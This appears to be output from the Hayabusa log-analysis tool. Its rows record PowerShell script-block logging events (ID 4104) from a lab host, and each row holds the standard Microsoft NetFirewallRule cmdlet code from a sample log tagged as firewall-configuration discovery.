'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 